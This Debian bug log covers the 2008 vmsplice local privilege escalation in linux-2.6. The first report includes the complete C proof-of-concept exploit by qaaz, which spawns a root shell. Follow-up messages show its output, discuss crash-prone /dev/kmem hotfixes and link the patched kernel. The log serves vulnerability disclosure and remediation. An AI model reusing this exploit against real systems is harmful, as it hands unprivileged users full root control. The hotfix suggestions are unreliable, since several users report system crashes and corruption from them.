Debian Bug report logs - #464953
linux-2.6: mmap() local root exploit

version graph

Package: linux-2.6; Maintainer for linux-2.6 is Debian Kernel Team <debian-kernel@lists.debian.org>;

Reported by: William Pitcock <nenolod@sacredspiral.co.uk>

Date: Sun, 10 Feb 2008 01:33:02 UTC

Severity: critical

Tags: patch, security

Merged with 464945, 465246

Found in versions 2.6.18.dfsg.1-17etch1, 2.6.22-3-generic, 2.6.17-1

Fixed in versions 2.6.24-4, 2.6.18.dfsg.1-18etch1, 2.6.22-6.lenny1

Done: Bastian Blank <waldi@debian.org>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, Debian Security Team <team@security.debian.org>, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to William Pitcock <nenolod@sacredspiral.co.uk>:
New Bug report received and forwarded. Copy sent to Debian Security Team <team@security.debian.org>, Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: William Pitcock <nenolod@sacredspiral.co.uk>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: linux-2.6: mmap() local root exploit
Date: Sat, 09 Feb 2008 19:29:53 -0600
Package: linux-2.6
Version: 2.6.22-3-generic
Severity: critical
Tags: security
Justification: root security hole

There is a security hole in all versions of linux-2.6 distributed by
Debian, including Etch's kernel.

The attached exploit code can be used to test if a kernel is vulnerable,
it starts a root shell.

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-3-generic (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

*** proof-of-concept.c
/*
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>

#define PIPE_BUFFERS	16
#define PG_compound	14
#define uint		unsigned int
#define static_inline	static inline __attribute__((always_inline))
#define STACK(x)	(x + sizeof(x) - 40)

struct page {
	unsigned long flags;
	int count;
	int mapcount;
	unsigned long private;
	void *mapping;
	unsigned long index;
	struct { long next, prev; } lru;
};

void	exit_code();
char	exit_stack[1024 * 1024];

void	die(char *msg, int err)
{
	printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
	fflush(stdout);
	fflush(stderr);
	exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice	316
#endif

#define USER_CS		0x73
#define USER_SS		0x7b
#define USER_FL		0x246

static_inline
void	exit_kernel()
{
	__asm__ __volatile__ (
	"movl %0, 0x10(%%esp) ;"
	"movl %1, 0x0c(%%esp) ;"
	"movl %2, 0x08(%%esp) ;"
	"movl %3, 0x04(%%esp) ;"
	"movl %4, 0x00(%%esp) ;"
	"iret"
	: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
	    "i" (USER_CS), "r" (exit_code)
	);
}

static_inline
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movl %%esp, %%eax ;"
	"andl %1, %%eax ;"
	"movl (%%eax), %0"
	: "=r" (curr)
	: "i" (~8191)
	);
	return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice	278
#endif

#define USER_CS		0x23
#define USER_SS		0x2b
#define USER_FL		0x246

static_inline
void	exit_kernel()
{
	__asm__ __volatile__ (
	"swapgs ;"
	"movq %0, 0x20(%%rsp) ;"
	"movq %1, 0x18(%%rsp) ;"
	"movq %2, 0x10(%%rsp) ;"
	"movq %3, 0x08(%%rsp) ;"
	"movq %4, 0x00(%%rsp) ;"
	"iretq"
	: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
	    "i" (USER_CS), "r" (exit_code)
	);
}

static_inline
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movq %%gs:(0), %0"
	: "=r" (curr)
	);
	return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice	__NR_vmsplice
_syscall4(
	long, _vmsplice,
	int, fd,
	struct iovec *, iov,
	unsigned long, nr_segs,
	unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)	syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void	kernel_code()
{
	int	i;
	uint	*p = get_current();

	for (i = 0; i < 1024-13; i++) {
		if (p[0] == uid && p[1] == uid &&
		    p[2] == uid && p[3] == uid &&
		    p[4] == gid && p[5] == gid &&
		    p[6] == gid && p[7] == gid) {
			p[0] = p[1] = p[2] = p[3] = 0;
			p[4] = p[5] = p[6] = p[7] = 0;
			p = (uint *) ((char *)(p + 8) + sizeof(void *));
			p[0] = p[1] = p[2] = ~0;
			break;
		}
		p++;
	}	

	exit_kernel();
}

void	exit_code()
{
	if (getuid() != 0)
		die("wtf", 0);

	printf("[+] root\n");
	putenv("HISTFILE=/dev/null");
	execl("/bin/bash", "bash", "-i", NULL);
	die("/bin/bash", errno);
}

int	main(int argc, char *argv[])
{
	int		pi[2];
	size_t		map_size;
	char *		map_addr;
	struct iovec	iov;
	struct page *	pages[5];

	uid = getuid();
	gid = getgid();
	setresuid(uid, uid, uid);
	setresgid(gid, gid, gid);

	printf("-----------------------------------\n");
	printf(" Linux vmsplice Local Root Exploit\n");
	printf(" By qaaz\n");
	printf("-----------------------------------\n");

	if (!uid || !gid)
		die("!@#$", 0);

	/*****/
	pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
	pages[1] = pages[0] + 1;

	map_size = PAGE_SIZE;
	map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[0]);
	printf("[+] page: 0x%lx\n", pages[1]);

	pages[0]->flags    = 1 << PG_compound;
	pages[0]->private  = (unsigned long) pages[0];
	pages[0]->count    = 1;
	pages[1]->lru.next = (long) kernel_code;

	/*****/
	pages[2] = *(void **) pages[0];
	pages[3] = pages[2] + 1;

	map_size = PAGE_SIZE;
	map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[2]);
	printf("[+] page: 0x%lx\n", pages[3]);

	pages[2]->flags    = 1 << PG_compound;
	pages[2]->private  = (unsigned long) pages[2];
	pages[2]->count    = 1;
	pages[3]->lru.next = (long) kernel_code;

	/*****/
	pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
	map_size = PAGE_SIZE;
	map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);
	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[4]);

	/*****/
	map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
	map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
	                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

	/*****/
	map_size -= 2 * PAGE_SIZE;
	if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
		die("munmap", errno);

	/*****/
	if (pipe(pi) < 0) die("pipe", errno);
	close(pi[0]);

	iov.iov_base = map_addr;
	iov.iov_len  = ULONG_MAX;

	signal(SIGPIPE, exit_code);
	_vmsplice(pi[1], &iov, 1, 0);
	die("vmsplice", errno);
	return 0;
}




Merged 464945 464953. Request was from Gregory Colpart <reg@evolix.fr> to control@bugs.debian.org. (Sun, 10 Feb 2008 02:15:06 GMT) Full text and rfc822 format available.

Tags added: patch Request was from Bastian Blank <waldi@debian.org> to control@bugs.debian.org. (Sun, 10 Feb 2008 12:03:07 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Morten Hustveit <morten@rashbox.org>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #14 received at 464953@bugs.debian.org (full text, mbox):

From: Morten Hustveit <morten@rashbox.org>
To: 464953@bugs.debian.org
Subject: Hotfix
Date: Sun, 10 Feb 2008 20:38:05 +0100
Hi,

a modification of the exploit that finds the address of sys_vmsplice in the
kernel (using /proc/kallsyms) and replaces the first byte with a RET instruction
(using mmap of /dev/kmem) is available at

  http://www.ping.uio.no/~mortehu/disable-vmsplice-if-exploitable.c

-- 
Morten Hustveit




Bug marked as found in version 2.6.18.dfsg.1-17etch1. Request was from "Artur R. Czechowski" <arturcz@hell.pl> to control@bugs.debian.org. (Sun, 10 Feb 2008 19:45:04 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Ari Pollak <ari@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #21 received at 464953@bugs.debian.org (full text, mbox):

From: Ari Pollak <ari@debian.org>
To: 464953@bugs.debian.org
Subject: (no subject)
Date: Sun, 10 Feb 2008 17:00:15 -0500
Unofficial prebuilt packages are here:
http://134.2.34.20/blank/debian/linux-2.6/
as referenced here:
http://lists.debian.org/debian-kernel/2008/02/msg00363.html




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Duncan Robertson <duncan@zog.net.au>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #26 received at 464953@bugs.debian.org (full text, mbox):

From: Duncan Robertson <duncan@zog.net.au>
To: 464953@bugs.debian.org
Subject: hotfix possibly unstable?
Date: Mon, 11 Feb 2008 12:04:53 +1100
Just mentioning that the hotfix mentioned here:

http://www.ping.uio.no/~mortehu/disable-vmsplice-if-exploitable.c	

appeared to have wedged (crashed hard, frozen) my machine, an otherwise
very stable pentium 4 machine running 2.6.18-5-686 (with nvidia
oldstable xorg proprietry drivers). nothing in syslog, etc.







Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Duncan Robertson <duncan@zog.net.au>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #31 received at 464953@bugs.debian.org (full text, mbox):

From: Duncan Robertson <duncan@zog.net.au>
To: 464953@bugs.debian.org
Subject: follow up information
Date: Mon, 11 Feb 2008 17:35:20 +1100
Just following up reported problem with security patch has not
re-occurred since rebooting (and rerunning fix), and no problem with 2
servers patched with disable-vmsplice-if-exploitable.c	either.
also I meant nvidia-kernel-legacy-96xx-2.6.18-5-686 not "oldstable" 






Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Michael Holzt <debian-bugreports@michael.holzt.de>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #36 received at 464953@bugs.debian.org (full text, mbox):

From: Michael Holzt <debian-bugreports@michael.holzt.de>
To: 464953@bugs.debian.org
Cc: Duncan Robertson <duncan@zog.net.au>
Subject: DO NOT USE THE HOTFIX!
Date: Mon, 11 Feb 2008 09:18:48 +0100
Just for the record: Do not use the "hotfix" named disable-vmsplice-if-
exploitable.c. The hotfix first tries to run the exploit (which would be 
totally unnecessary for the actual "fix" by the way and is therefore a
very dumb thing to do), and this still leads to kernel memory corruption
which will render the system unstable. You can imagine what might come
from corrupted kernel beside a simple crash (e.g. data loss).

It shall be possible to remove the actual exploit attempt from the "fix",
but seems to be another solution which apparently compiles to a kernel
module which will catch and report attempts to (ab)use vmsplice at
http://home.powertech.no/oystein/ptpatch2008/ptpatch2008.c


Regards
Michael

-- 
It's an insane world, but i'm proud to be a part of it. -- Bill Hicks




Tags added: pending Request was from Bastian Blank <waldi@alioth.debian.org> to control@bugs.debian.org. (Mon, 11 Feb 2008 08:51:21 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Jon Dowland <jon+bts@alcopop.org>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #43 received at 464953@bugs.debian.org (full text, mbox):

From: Jon Dowland <jon+bts@alcopop.org>
To: 464953@bugs.debian.org
Subject: exploit hung my machine
Date: Mon, 11 Feb 2008 09:29:29 +0000
The exploit code (rather than the hotfix, which I didn't
try) caused my laptop to hang (thinkpad x40 tracking sid,
one of the standard Debian kernel packages, no non-standard
modules, untainted kernel). I would not be suprised if the
reworked hotfix had the same bug in it.

We tried the hotfix on a Redhat Enterprise 5 machine at
work and that hung similarly.

The module solution Michael Holtz posted looks much safer.

-- 
Jon Dowland
ISS UNIX Team




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Mircea Gherzan <mgherzan@rdslink.ro>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #48 received at 464953@bugs.debian.org (full text, mbox):

From: Mircea Gherzan <mgherzan@rdslink.ro>
To: 464953@bugs.debian.org
Subject: seems to be fixed
Date: Mon, 11 Feb 2008 11:53:48 +0200
On a vanilla 2.6.24.2, the exploit no longer works:

-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e23000 .. 0xb7e55000
[-] vmsplice: Bad address

-- 
Mircea Gherzan
Faculty of Automatic Control and Computers
Politehnica University of Bucharest




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to "Nikita V. Youshchenko" <yoush@cs.msu.su>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #53 received at 464953@bugs.debian.org (full text, mbox):

From: "Nikita V. Youshchenko" <yoush@cs.msu.su>
To: 464953@bugs.debian.org
Subject: ptpatch2008.c does not work
Date: Mon, 11 Feb 2008 13:00:35 +0300
> but seems to be another solution which apparently compiles to a kernel
> module which will catch and report attempts to (ab)use vmsplice at
> http://home.powertech.no/oystein/ptpatch2008/ptpatch2008.c

I've just tried to compile this module.
It successfully insmod'ed:

Feb 11 12:54:29 zigzag kernel: ptpatch2008: init, (c) 2008 
oystein@powertech.no
Feb 11 12:54:29 zigzag kernel: ptpatch2008: syscalls c02ea3c0
Feb 11 12:54:29 zigzag kernel: hooked sys_vmsplice

However exploit code from the top of 
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464953 still works:

nikita@zigzag:~/adm/hotfix> ./exploit
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d97000 .. 0xb7dc9000
[+] root
root@zigzag:~/adm/hotfix> whoami
root




Forcibly Merged 464945 464953 465246. Request was from Bastian Blank <waldi@debian.org> to control@bugs.debian.org. (Mon, 11 Feb 2008 12:57:07 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Asheesh Laroia <asheesh@asheesh.org>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #60 received at 464953@bugs.debian.org (full text, mbox):

From: Asheesh Laroia <asheesh@asheesh.org>
To: 464953@bugs.debian.org
Subject: Fix released
Date: Mon, 11 Feb 2008 08:12:24 -0800 (PST)
See 
http://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00056.html 
.

apt-get your way to the beautiful fixed future.

-- Asheesh.

-- 
You may worry about your hair-do today, but tomorrow much peanut butter will
be sold.




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Ivan Jager <aij+debian@andrew.cmu.edu>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #65 received at 464953@bugs.debian.org (full text, mbox):

From: Ivan Jager <aij+debian@andrew.cmu.edu>
To: 464953@bugs.debian.org
Subject: Amd64 hotfix
Date: Mon, 11 Feb 2008 13:54:35 -0500 (EST)
[Message part 1 (text/plain, inline)]
I modified the hotfix so it will also patch compat_sys_vmsplice, which 
would be important on amd64 boxen with x86 compatibility enabled.

It's attached, or if for some reason it doesn't make it through, you can 
fetch it from 
http://www.andrew.cmu.edu/~aij/disable-vmsplice-if-exploitable-aij.c

Ivan
[disable-vmsplice-if-exploitable-aij.c (text/plain, attachment)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Kyle McMartin <kyle@mcmartin.ca>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #70 received at 464953@bugs.debian.org (full text, mbox):

From: Kyle McMartin <kyle@mcmartin.ca>
To: Ivan Jager <aij+debian@andrew.cmu.edu>, 464953@bugs.debian.org
Subject: Re: Bug#464953: Amd64 hotfix
Date: Mon, 11 Feb 2008 14:21:25 -0500
On Mon, Feb 11, 2008 at 01:54:35PM -0500, Ivan Jager wrote:
> I modified the hotfix so it will also patch compat_sys_vmsplice, which 
> would be important on amd64 boxen with x86 compatibility enabled.
>

these "hotfixes" are so completely wrong, it's not even funny.
you're playing russian roulette with the return value.

   0:   b8 da ff ff ff          mov    $0xffffffda,%eax
   5:   c3                      retq   

is more correct (return -ENOSYS)

regards, kyle




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Michael Holzt <debian-bugreports@michael.holzt.de>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #75 received at 464953@bugs.debian.org (full text, mbox):

From: Michael Holzt <debian-bugreports@michael.holzt.de>
To: 464953@bugs.debian.org
Cc: Ivan Jager <aij+debian@andrew.cmu.edu>
Subject: Re: Amd64 hotfix
Date: Tue, 12 Feb 2008 01:08:26 +0100
> I modified the hotfix so it will also patch compat_sys_vmsplice, which 
> would be important on amd64 boxen with x86 compatibility enabled.

Once again: The "hotfix" and also your modification are stupid, stupid,
stupid and dangerous. The "hotfix" first attempts to try the exploit and
this corrupts kernel memory. It is very likely that your system will
crash shortly after and numerous people have reported that the "hotfix"
just has that result either instantaneous or after a short while.

Also while overwriting the vmsplice syscall with a "ret" will prevent 
the hole from being abused, this will also confuse software which wants
to use the vmsplice call. At least one should return with a error. I'm
not sure if there is any software in normal use which uses vmsplice but
keep this in mind.

And finally: If you really really want to use this kind of fix, why
don't you just get rid of all the dangerous exploit code and only keep
the code from inside the "de_exploit()" function and then call this
code as root? This would do the job without causing memory corruption.

But the best fix still is to just install a updated kernel and reboot.
As said, you will anyway (but at a random time), at least when using 
this stupid "hotfix" which destroys your kernel memory. There might be
systems which cannot be rebooted right now, but i most cases i feel
that people who wan't to apply such a hotfix instead of deploying a
clean solution are just lazy.


Regards
Michael

-- 
It's an insane world, but i'm proud to be a part of it. -- Bill Hicks




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to n0p <lbernal@gmail.com>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #80 received at 464953@bugs.debian.org (full text, mbox):

From: n0p <lbernal@gmail.com>
To: 464953@bugs.debian.org
Subject: The exploit corrupted the system partition
Date: Tue, 12 Feb 2008 13:38:19 -0100
[Message part 1 (text/plain, inline)]
Just FYI
The exploit corrupted the system partition (reiserFS), a user in my server
tested the exploit and all the root got corrupted and impossible to recover.
It was a fully updated Debian Testing using the debian default kernel in a
fully stable pentium4 otherwise.

Next time i'll use the grsec patches and lock the fuck up of my users ¬¬
[Message part 2 (text/html, inline)]

Bug marked as fixed in version 2.6.18.dfsg.1-18etch1. Request was from Stefan Fritsch <sf@debian.org> to control@bugs.debian.org. (Fri, 22 Feb 2008 19:06:10 GMT) Full text and rfc822 format available.

Bug marked as fixed in version 2.6.22-6.lenny1. Request was from Stefan Fritsch <sf@debian.org> to control@bugs.debian.org. (Fri, 22 Feb 2008 19:06:13 GMT) Full text and rfc822 format available.

Bug marked as found in version 2.6.17-1. Request was from Stefan Fritsch <sf@debian.org> to control@bugs.debian.org. (Fri, 22 Feb 2008 19:06:16 GMT) Full text and rfc822 format available.

Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Fri, 28 Mar 2008 07:39:02 GMT) Full text and rfc822 format available.

Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Sun Apr 20 16:22:51 2014; Machine Name: beach.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.